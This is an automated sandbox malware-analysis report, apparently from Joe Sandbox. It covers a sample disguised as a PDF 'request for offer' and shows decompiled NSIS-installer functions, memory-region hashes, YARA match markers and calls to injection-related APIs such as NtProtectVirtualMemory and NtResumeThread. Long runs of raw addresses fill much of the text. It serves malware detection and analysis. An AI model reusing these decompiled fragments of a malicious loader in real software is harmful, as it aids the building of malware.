0x0040687b
0x00406882
0x00000000
0x00406882
0x00406851
0x00406854
0x00406859
0x00406859
0x00406864
0x0040686c
0x0040686f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068b4
0x004068ba
0x004068bd
0x004068ca
0x004068d2
0x00000000
0x00000000
0x00406889
0x00406889
0x0040688d
0x004070d8
0x00000000
0x004070d8
0x00406899
0x004068a4
0x004068a4
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b79
0x00406b7d
0x00406b9b
0x00406b9e
0x00406ba5
0x00406ba8
0x00406bab
0x00406bae
0x00406bb1
0x00406bb4
0x00406bb6
0x00406bbd
0x00406bbe
0x00406bc0
0x00406bc3
0x00406bc6
0x00406bc9
0x00406bc9
0x00406bce
0x00000000
0x00406bce
0x00406b7f
0x00406b82
0x00406b85
0x00406b8f
0x00000000
0x00000000
0x00406be3
0x00406be7
0x00406c0a
0x00406c0d
0x00406c10
0x00406c1a
0x00406be9
0x00406be9
0x00406bec
0x00406bef
0x00406bf2
0x00406bff
0x00406c02
0x00406c02
0x00000000
0x00000000
0x00406c26
0x00406c2a
0x00000000
0x00000000
0x00406c30
0x00406c34
0x00000000
0x00000000
0x00406c3a
0x00406c3c
0x00406c40
0x00406c40
0x00406c43
0x00406c47
0x00000000
0x00000000
0x00406c97
0x00406c9b
0x00406ca2
0x00406ca5
0x00406ca8
0x00406cb2
0x00000000
0x00406cb2
0x00406c9d
0x00000000
0x00000000
0x00406cbe
0x00406cc2
0x00406cc9
0x00406ccc
0x00406ccf
0x00406cc4
0x00406cc4
0x00406cc4
0x00406cd2
0x00406cd5
0x00406cd8
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce1
0x00406ce4
0x00406ceb
0x00406cf0
0x00000000
0x00000000
0x00406d7e
0x00406d7e
0x00406d82
0x00407120
0x00000000
0x00407120
0x00406d88
0x00406d8b
0x00406d8e
0x00406d92
0x00406d95
0x00406d9b
0x00406d9d
0x00406d9d
0x00406d9d
0x00406da0
0x00406da3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406e01
0x00406e01
0x00406e05
0x0040712c
0x00000000
0x0040712c
0x00406e0b
0x00406e0e
0x00406e11
0x00406e15
0x00406e18
0x00406e1e
0x00406e20
0x00406e20
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406bd1
0x00406bd1
0x00406bd4
0x00000000
0x00000000
0x00406f10
0x00406f14
0x00406f36
0x00406f39
0x00406f43
0x00000000
0x00406f43
0x00406f16
0x00406f19
0x00406f1d
0x00406f20
0x00406f20
0x00406f23
0x00000000
0x00000000
0x00406fcd
0x00406fd1
0x00406fef
0x00406fef
0x00406fef
0x00406ff6
0x00406ffd
0x00407004
0x00407004
0x00000000
0x00407004
0x00406fd3
0x00406fd6
0x00406fd9
0x00406fdc
0x00406fe3
0x00406f27
0x00406f27
0x00406f2a
0x00000000
0x00000000
0x004070be
0x004070c1
0x00000000
0x00000000
0x00406cf8
0x00406cfa
0x00406d01
0x00406d02
0x00406d04
0x00406d07
0x00000000
0x00000000
0x00406d0f
0x00406d12
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d1a
0x00406d1d
0x00406d24
0x00406d27
0x00406d35
0x00000000
0x00000000
0x0040700b
0x0040700b
0x0040700e
0x00407015
0x00000000
0x00000000
0x0040701a
0x0040701a
0x0040701e
0x00407156
0x00000000
0x00407156
0x00407024
0x00407027
0x0040702a
0x0040702e
0x00407031
0x00407037
0x00407039
0x00407039
0x00407039
0x0040703c
0x0040703f
0x0040703f
0x0040703f
0x0040703f
0x00407042
0x00407042
0x00407046
0x004070a6
0x004070a9
0x004070ae
0x004070af
0x004070b1
0x004070b3
0x004070b6
0x00000000
0x004070b6
0x00407048
0x0040704e
0x00407051
0x00407054
0x00407057
0x0040705a
0x0040705d
0x00407060
0x00407063
0x00407066
0x00407069
0x00407082
0x00407085
0x00407088
0x0040708b
0x0040708f
0x00407091
0x00407091
0x00407092
0x00407095
0x0040706b
0x0040706b
0x00407073
0x00407078
0x0040707a
0x0040707d
0x0040707d
0x00407098
0x0040709f
0x00000000
0x004070a1
0x00000000
0x004070a1
0x00000000
0x00406d3d
0x00406d40
0x00406d76
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea9
0x00406ea9
0x00406eac
0x00406eae
0x00407138
0x00000000
0x00407138
0x00406eb4
0x00406eb7
0x00000000
0x00000000
0x00406ebd
0x00406ec1
0x00406ec4
0x00406ec4
0x00406ec4
0x00000000
0x00406ec4
0x00406d42
0x00406d44
0x00406d46
0x00406d48
0x00406d4b
0x00406d4c
0x00406d4e
0x00406d50
0x00406d53
0x00406d56
0x00406d6c
0x00406d71
0x00406da9
0x00406da9
0x00406dad
0x00406dd9
0x00406ddb
0x00406de2
0x00406de5
0x00406de8
0x00406de8
0x00406ded
0x00406ded
0x00406def
0x00406df2
0x00406df9
0x00406dfc
0x00406e29
0x00406e29
0x00406e2c
0x00406e2f
0x00406ea3
0x00406ea3
0x00406ea3
0x00000000
0x00406ea3
0x00406e31
0x00406e37
0x00406e3a
0x00406e3d
0x00406e40
0x00406e43
0x00406e46
0x00406e49
0x00406e4c
0x00406e4f
0x00406e52
0x00406e6b
0x00406e6d
0x00406e70
0x00406e71
0x00406e74
0x00406e76
0x00406e79
0x00406e7b
0x00406e7d
0x00406e80
0x00406e82
0x00406e85
0x00406e89
0x00406e8b
0x00406e8b
0x00406e8c
0x00406e8f
0x00406e92
0x00406e54
0x00406e54
0x00406e5c
0x00406e61
0x00406e63
0x00406e66
0x00406e66
0x00406e95
0x00406e9c
0x00406e26
0x00406e26
0x00406e26
0x00406e26
0x00000000
0x00406e9e
0x00000000
0x00406e9e
0x00406e9c
0x00406daf
0x00406db2
0x00406db4
0x00406db7
0x00406dba
0x00406dbd
0x00406dbf
0x00406dc2
0x00406dc5
0x00406dc5
0x00406dc8
0x00406dc8
0x00406dcb
0x00406dd2
0x00406da6
0x00406da6
0x00406da6
0x00406da6
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406d58
0x00406d5b
0x00406d5d
0x00406d60
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c4a
0x00406c4a
0x00406c4e
0x00407114
0x00000000
0x00407114
0x00406c54
0x00406c57
0x00406c5a
0x00406c5d
0x00406c5f
0x00406c5f
0x00406c5f
0x00406c62
0x00406c65
0x00406c68
0x00406c6b
0x00406c6e
0x00406c71
0x00406c72
0x00406c74
0x00406c74
0x00406c74
0x00406c77
0x00406c7a
0x00406c7d
0x00406c80
0x00406c80
0x00406c80
0x00406c83
0x00000000
0x00000000
0x00406ec7
0x00406ec7
0x00406ec7
0x00406ecb
0x00000000
0x00000000
0x00406ed1
0x00406ed4
0x00406ed7
0x00406eda
0x00406edc
0x00406edc
0x00406edc
0x00406edf
0x00406ee2
0x00406ee5
0x00406ee8
0x00406eeb
0x00406eee
0x00406eef
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef7
0x00406efa
0x00406efd
0x00406f00
0x00406f04
0x00406f06
0x00406f09
0x00000000
0x00406f0b
0x00000000
0x00406f0b
0x00406f09
0x0040713e
0x00000000
0x00000000
0x0040676d

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c82c24978351f7c13972ed02e311308c491194f519d2ef9506af47d33a0889c0
Instruction ID: a9eeadc94889c10b02ffd6b9c25b4bb5d01c95f6ce45251ce11bee8d9ce53b4a
Opcode Fuzzy Hash: c82c24978351f7c13972ed02e311308c491194f519d2ef9506af47d33a0889c0
Instruction Fuzzy Hash: BFF18671D04229CBCF28CFA8C8946ADBBB1FF45305F25816ED856BB281C7785A86CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406555 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406555(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426778); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426778;
			}

0x00406560
0x00406569
0x00000000
0x00406576
0x0040656c
0x00000000

APIs

FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405D17,00425F30,00425F30,00000000,00425F30,00425F30, 4t.t,?,74E02EE0,00405A23,?,74E03420,74E02EE0), ref: 00406560
FindClose.KERNEL32(00000000), ref: 0040656C

Strings

xgB, xrefs: 00406556

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: xgB
API String ID: 2295610775-399326502
Opcode ID: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
Instruction ID: a17ed3a5ae88bd5f55df5b749dd223de66f1ff534e9406d7b6838b5a0b6fdea6
Opcode Fuzzy Hash: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
Instruction Fuzzy Hash: 6FD01231904530ABC3111778BE0CC5B7A689F553717628F36F466F12F4C7348C22869C

Uniqueness

Uniqueness Score: -1.00%

Function 032D58A1 Relevance: 3.0, Strings: 2, Instructions: 454COMMON

Download Yara Rule

Strings

|`Q, xrefs: 032D5ACF
;eX, xrefs: 032EDC4E

Memory Dump Source

Source File: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32d0000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Yara matches

Similarity

API ID:
String ID: ;eX$|`Q
API String ID: 0-3602168467
Opcode ID: e2aab9b4322aebc85c9a70b4a887da11fa1aca8293028a09153bcbb294dc6bc1
Instruction ID: 4f5bb29546b0030282db050a73da1e40e1525eb31163055230f8bd61d71d7c84
Opcode Fuzzy Hash: e2aab9b4322aebc85c9a70b4a887da11fa1aca8293028a09153bcbb294dc6bc1
Instruction Fuzzy Hash: C302697160878ACFDB34DE28CD953DA37A6EFA6360F94422ECC499F255C7718A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 032D6122 Relevance: 1.7, Strings: 1, Instructions: 435COMMON

Download Yara Rule

Strings

;eX, xrefs: 032EDC4E

Memory Dump Source

Source File: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32d0000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Yara matches

Similarity

API ID:
String ID: ;eX
API String ID: 0-1151402646
Opcode ID: 1c37b02232910fc646520e351742327645b57d5731187799ec0d5ba2fa39557f
Instruction ID: 95d29e80aaaaa319b85c40da51026dd74cb2f8db52e86af6db1253cb77f5edf8
Opcode Fuzzy Hash: 1c37b02232910fc646520e351742327645b57d5731187799ec0d5ba2fa39557f
Instruction Fuzzy Hash: DFE16575A1438A9FDF34EE28DCA57DB37A6EF59350FC5411EDC8A9B204D7308A828B41

Uniqueness

Uniqueness Score: -1.00%

Function 032ECB42 Relevance: 1.6, APIs: 1, Instructions: 78fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,FB194F2F,293687FB,B4823BD1), ref: 032ECCC0

Memory Dump Source

Source File: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32d0000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2e6fb258e7a745e21c49c34d14b6f065bb1e491f97385602736793ec81f60500
Instruction ID: 4481198e38e1ccb818c8f7d3398055d6d8359dd04bbbecc1acde8499c9b52153
Opcode Fuzzy Hash: 2e6fb258e7a745e21c49c34d14b6f065bb1e491f97385602736793ec81f60500
Instruction Fuzzy Hash: E121F771A042469BDF389E3889727EF76A7EF903C0F56402EDC8B57684DB3049818A41

Uniqueness

Uniqueness Score: -1.00%

Function 032DA6F5 Relevance: 1.6, Strings: 1, Instructions: 309COMMON

Download Yara Rule

Strings

;eX, xrefs: 032EDC4E

Memory Dump Source

Source File: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32d0000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Yara matches

Similarity

API ID:
String ID: ;eX
API String ID: 0-1151402646
Opcode ID: d353a2019f6fee4b85d611e941f946892ad5be1129cce2ad3f848def1b4b7293
Instruction ID: aa933a1df078ca7cbcb306ae0237107a6130c6b15a8e40694c5baae16831cbcd
Opcode Fuzzy Hash: d353a2019f6fee4b85d611e941f946892ad5be1129cce2ad3f848def1b4b7293
Instruction Fuzzy Hash: BAB17875A05746CFEB30CE2C8DA57D633F5AF663A0F85422D8C899B248D7318E818741

Uniqueness

Uniqueness Score: -1.00%

Function 032D5E16 Relevance: 1.6, Strings: 1, Instructions: 307COMMON

Download Yara Rule

Strings

;eX, xrefs: 032EDC4E

Memory Dump Source

Source File: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32d0000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Yara matches

Similarity

API ID:
String ID: ;eX
API String ID: 0-1151402646
Opcode ID: a8f1b34d360d07a450d91220d695b7bf911cb055a03a99f4bcaba7d369324514
Instruction ID: f753b47e0b5dadfbe8fce6b8bf96b85cf055e74ae040442cfb97cc29e6738203
Opcode Fuzzy Hash: a8f1b34d360d07a450d91220d695b7bf911cb055a03a99f4bcaba7d369324514
Instruction Fuzzy Hash: D2B1457570438A9FDF309E299DE57CA37A5AF5A3A0F84022EDC8D9B244D7718A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 032F1813 Relevance: 1.5, APIs: 1, Instructions: 47nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(00000001,032F230B), ref: 032F19FD

Memory Dump Source

Source File: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32d0000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Yara matches

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 9d7d4b816399743d7458dc6664fb853c68d827a7423c578822bfd0c95a340898
Instruction ID: c9940764204e91db64532b3b110405f9e9286a24cc5fcb47dde135312c09c750
Opcode Fuzzy Hash: 9d7d4b816399743d7458dc6664fb853c68d827a7423c578822bfd0c95a340898
Instruction Fuzzy Hash: DF018430634246CFDF28DD348A943E8B7A2AF89244FA5413ACE07CB614D774B9E4CA41

Uniqueness

Uniqueness Score: -1.00%

Function 032F07A4 Relevance: 1.5, APIs: 1, Instructions: 40nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(0AD5B06E,?,?,?,?,032EFA6B,90899D6C,032D23AC), ref: 032F082C

Memory Dump Source

Source File: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32d0000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 320540ca0ac152d1acad4c5669e8d1edeb09f813a3802218a8dabe29b048aa99
Instruction ID: 7510c7485b1fee03829a949d080528d08a34db666a991c8b068853aa99044115
Opcode Fuzzy Hash: 320540ca0ac152d1acad4c5669e8d1edeb09f813a3802218a8dabe29b048aa99
Instruction Fuzzy Hash: F80121B5B153499FDB38CE1CDDA57EA36AA9F88340F05812EEC0A9B344C7706E01C714

Uniqueness

Uniqueness Score: -1.00%

Function 0040287E Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E0040287E(short __ebx, short* __esi) {
				void* _t8;
				void* _t21;

				_t8 = FindFirstFileW(E00402C53(2), _t21 - 0x2b8); // executed
				if(_t8 != 0xffffffff) {
					E00406159( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x28c);
					_push(__esi);
					E00406212();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x0040288d
0x00402896
0x004028b1
0x004028bc
0x004028bd
0x004029f7
0x00402898
0x0040289b
0x0040289e
0x004028a1
0x004028a1
0x00402ade
0x00402aea

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040288D

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 7dc552ce7d82bd07ce53d464f116ca63b024d3b86992f6f833599f39f59c2b13
Instruction ID: 47d6d4f0c9e08c45c0f9c68b677465f339eb18c6442485c4f22287ce904ecf90
Opcode Fuzzy Hash: 7dc552ce7d82bd07ce53d464f116ca63b024d3b86992f6f833599f39f59c2b13
Instruction Fuzzy Hash: 76F08971A04104DBDB50EBE4D94999DB374EF14314F2185BBE112F71D0D7B849819B29

Uniqueness

Uniqueness Score: -1.00%

Function 032D9D4A Relevance: 1.5, Strings: 1, Instructions: 222COMMON

Download Yara Rule

Strings

;eX, xrefs: 032EDC4E

Memory Dump Source

Source File: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32d0000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Yara matches

Similarity

API ID:
String ID: ;eX
API String ID: 0-1151402646
Opcode ID: 68a2de16adab0dbf6be9c73c9707bdd275f0907a732e28e2722259b2584ffda9
Instruction ID: 9f44fba57c75ecd8c8bb687671bc767aa86693ca94f7a80add8bd1266b7fc7bd
Opcode Fuzzy Hash: 68a2de16adab0dbf6be9c73c9707bdd275f0907a732e28e2722259b2584ffda9
Instruction Fuzzy Hash: F27188747183868FDF34DE288CE57CA37A6AF563A0F84421EDC999F295C7318A81C741

Uniqueness

Uniqueness Score: -1.00%

Function 00403DFE Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00403DFE(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int _t39;
				signed int _t41;
				struct HWND__* _t51;
				signed int _t69;
				struct HWND__* _t75;
				signed int _t88;
				struct HWND__* _t93;
				signed int _t101;
				int _t105;
				signed int _t117;
				signed int _t118;
				int _t119;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				long _t132;
				int _t134;
				int _t135;
				void* _t136;

				_t117 = _a8;
				if(_t117 == 0x110 || _t117 == 0x408) {
					_t37 = _a12;
					_t127 = _a4;
					__eflags = _t117 - 0x110;
					 *0x423710 = _t37;
					if(_t117 == 0x110) {
						 *0x42a248 = _t127;
						 *0x423724 = GetDlgItem(_t127, 1);
						_t93 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x4216f0 = _t93;
						E004042D6(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429228);
						 *0x42920c = E0040140B(4);
						_t37 = 1;
						__eflags = 1;
						 *0x423710 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t135 = 0;
					_t132 = (_t124 << 6) +  *0x42a260;
					__eflags = _t124;
					if(_t124 < 0) {
						L34:
						E00404322(0x40b);
						while(1) {
							_t39 =  *0x423710;
							 *0x40a39c =  *0x40a39c + _t39;
							_t132 = _t132 + (_t39 << 6);
							_t41 =  *0x40a39c; // 0x0
							__eflags = _t41 -  *0x42a264;
							if(_t41 ==  *0x42a264) {
								E0040140B(1);
							}
							__eflags =  *0x42920c - _t135;
							if( *0x42920c != _t135) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a264; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t118 =  *(_t132 + 0x14);
							E00406234(_t118, _t127, _t132, 0x43a000,  *((intOrPtr*)(_t132 + 0x24)));
							_push( *((intOrPtr*)(_t132 + 0x20)));
							_push(0xfffffc19);
							E004042D6(_t127);
							_push( *((intOrPtr*)(_t132 + 0x1c)));
							_push(0xfffffc1b);
							E004042D6(_t127);
							_push( *((intOrPtr*)(_t132 + 0x28)));
							_push(0xfffffc1a);
							E004042D6(_t127);
							_t51 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2cc - _t135;
							_v32 = _t51;
							if( *0x42a2cc != _t135) {
								_t118 = _t118 & 0x0000fefd | 0x00000004;
								__eflags = _t118;
							}
							ShowWindow(_t51, _t118 & 0x00000008); // executed
							EnableWindow( *(_t136 + 0x30), _t118 & 0x00000100); // executed
							E004042F8(_t118 & 0x00000002);
							_t119 = _t118 & 0x00000004;
							EnableWindow( *0x4216f0, _t119);
							__eflags = _t119 - _t135;
							if(_t119 == _t135) {
								_push(1);
							} else {
								_push(_t135);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t135), 0xf060, ??);
							SendMessageW( *(_t136 + 0x38), 0xf4, _t135, 1);
							__eflags =  *0x42a2cc - _t135;
							if( *0x42a2cc == _t135) {
								_push( *0x423724);
							} else {
								SendMessageW(_t127, 0x401, 2, _t135);
								_push( *0x4216f0);
							}
							E0040430B();
							E00406212(0x423728, 0x429240);
							E00406234(0x423728, _t127, _t132,  &(0x423728[lstrlenW(0x423728)]),  *((intOrPtr*)(_t132 + 0x18)));
							SetWindowTextW(_t127, 0x423728); // executed
							_push(_t135);
							_t69 = E00401389( *((intOrPtr*)(_t132 + 8)));
							__eflags = _t69;
							if(_t69 != 0) {
								continue;
							} else {
								__eflags =  *_t132 - _t135;
								if( *_t132 == _t135) {
									continue;
								}
								__eflags =  *(_t132 + 4) - 5;
								if( *(_t132 + 4) != 5) {
									DestroyWindow( *0x429218); // executed
									 *0x422700 = _t132;
									__eflags =  *_t132 - _t135;
									if( *_t132 <= _t135) {
										goto L58;
									}
									_t75 = CreateDialogParamW( *0x42a240,  *_t132 +  *0x429220 & 0x0000ffff, _t127,  *( *(_t132 + 4) * 4 + "sD@"), _t132); // executed
									__eflags = _t75 - _t135;
									 *0x429218 = _t75;
									if(_t75 == _t135) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t132 + 0x2c)));
									_push(6);
									E004042D6(_t75);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t136 + 0x10);
									ScreenToClient(_t127, _t136 + 0x10);
									SetWindowPos( *0x429218, _t135,  *(_t136 + 0x20),  *(_t136 + 0x20), _t135, _t135, 0x15);
									_push(_t135);
									E00401389( *((intOrPtr*)(_t132 + 0xc)));
									__eflags =  *0x42920c - _t135;
									if( *0x42920c != _t135) {
										goto L61;
									}
									ShowWindow( *0x429218, 8); // executed
									E00404322(0x405);
									goto L58;
								}
								__eflags =  *0x42a2cc - _t135;
								if( *0x42a2cc != _t135) {
									goto L61;
								}
								__eflags =  *0x42a2c0 - _t135;
								if( *0x42a2c0 != _t135) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x429218);
						 *0x42a248 = _t135;
						EndDialog(_t127,  *0x421ef8);
						goto L58;
					} else {
						__eflags = _t37 - 1;
						if(_t37 != 1) {
							L33:
							__eflags =  *_t132 - _t135;
							if( *_t132 == _t135) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t88 = E00401389( *((intOrPtr*)(_t132 + 0x10)));
						__eflags = _t88;
						if(_t88 == 0) {
							goto L33;
						}
						SendMessageW( *0x429218, 0x40f, 0, 1);
						__eflags =  *0x42920c;
						return 0 |  *0x42920c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t135 = 0;
					if(_t117 == 0x47) {
						SetWindowPos( *0x423708, _t127, 0, 0, 0, 0, 0x13);
					}
					if(_t117 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x423708,  ~(_a12 - 1) & _t117);
					}
					if(_t117 != 0x40d) {
						__eflags = _t117 - 0x11;
						if(_t117 != 0x11) {
							__eflags = _t117 - 0x111;
							if(_t117 != 0x111) {
								L26:
								return E0040433D(_t117, _a12, _a16);
							}
							_t134 = _a12 & 0x0000ffff;
							_t128 = GetDlgItem(_t127, _t134);
							__eflags = _t128 - _t135;
							if(_t128 == _t135) {
								L13:
								__eflags = _t134 - 1;
								if(_t134 != 1) {
									__eflags = _t134 - 3;
									if(_t134 != 3) {
										_t129 = 2;
										__eflags = _t134 - _t129;
										if(_t134 != _t129) {
											L25:
											SendMessageW( *0x429218, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42a2cc - _t135;
										if( *0x42a2cc == _t135) {
											_t101 = E0040140B(3);
											__eflags = _t101;
											if(_t101 != 0) {
												goto L26;
											}
											 *0x421ef8 = 1;
											L21:
											_push(0x78);
											L22:
											E004042AF();
											goto L26;
										}
										E0040140B(_t129);
										 *0x421ef8 = _t129;
										goto L21;
									}
									__eflags =  *0x40a39c - _t135; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t134);
								goto L22;
							}
							SendMessageW(_t128, 0xf3, _t135, _t135);
							_t105 = IsWindowEnabled(_t128);
							__eflags = _t105;
							if(_t105 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongW(_t127, _t135, _t135);
						return 1;
					} else {
						DestroyWindow( *0x429218);
						 *0x429218 = _a12;
						L58:
						if( *0x425728 == _t135 &&  *0x429218 != _t135) {
